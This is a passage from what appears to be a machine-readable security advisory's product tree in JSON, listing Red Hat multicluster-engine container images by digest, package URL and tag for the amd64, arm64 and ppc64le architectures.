"pkg:oci/managed-serviceaccount-rhel9@sha256%3A3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775691793"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "product_identification_helper": {"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3Ac67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296534"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "product_identification_helper": {"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775778326"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "product_identification_helper": {"purl": "pkg:oci/placement-rhel9@sha256%3A8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977212"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "product_identification_helper": {"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296540"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "product_identification_helper": {"purl": "pkg:oci/registration-rhel9@sha256%3Acd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977180"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "product_identification_helper": {"purl": "pkg:oci/registration-operator-rhel9@sha256%3A65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977181"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64", "product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64", "product_identification_helper": {"purl": "pkg:oci/work-rhel9@sha256%3Ab6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977184"}}}], "category": "architecture", "name": "amd64"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "product_identification_helper": {"purl": "pkg:oci/addon-manager-rhel9@sha256%3A437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977126"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "product_identification_helper": {"purl": "pkg:oci/must-gather-rhel9@sha256%3A071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776434265"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "product_identification_helper": {"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775678862"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776038312"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Af856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382931"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776210187"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Ab41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775826440"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Ac6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382976"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Ac3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382929"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "product_identification_helper": {"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296503"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "product_identification_helper": {"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775864344"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "product_identification_helper": {"purl": "pkg:oci/console-mce-rhel9@sha256%3Aba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776223790"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "product_identification_helper": {"purl": "pkg:oci/discovery-rhel9@sha256%3Aecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776103237"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "product_identification_helper": {"purl": "pkg:oci/hive-rhel9@sha256%3Aa1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776286716"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "product_identification_helper": {"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Ad55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775691813"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "product_identification_helper": {"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Ab6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775950593"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "product_identification_helper": {"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3Aaaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775950592"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "product_identification_helper": {"purl": "pkg:oci/image-based-install-rhel9@sha256%3Abb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776469416"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "product_identification_helper": {"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Af88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775736638"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "product_identification_helper": {"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775691793"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "product_identification_helper": {"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3Af076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296534"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "product_identification_helper": {"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775778326"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "product_identification_helper": {"purl": "pkg:oci/placement-rhel9@sha256%3A0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977212"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "product_identification_helper": {"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3Acb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296540"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "product_identification_helper": {"purl": "pkg:oci/registration-rhel9@sha256%3Ae84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977180"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "product_identification_helper": {"purl": "pkg:oci/registration-operator-rhel9@sha256%3A2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977181"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "product": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "product_identification_helper": {"purl": "pkg:oci/work-rhel9@sha256%3A2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d?arch=arm64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977184"}}}], "category": "architecture", "name": "arm64"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "product_identification_helper": {"purl": "pkg:oci/addon-manager-rhel9@sha256%3Af82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775977126"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "product_identification_helper": {"purl": "pkg:oci/must-gather-rhel9@sha256%3A76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776434265"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "product_identification_helper": {"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775678862"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "product_id": 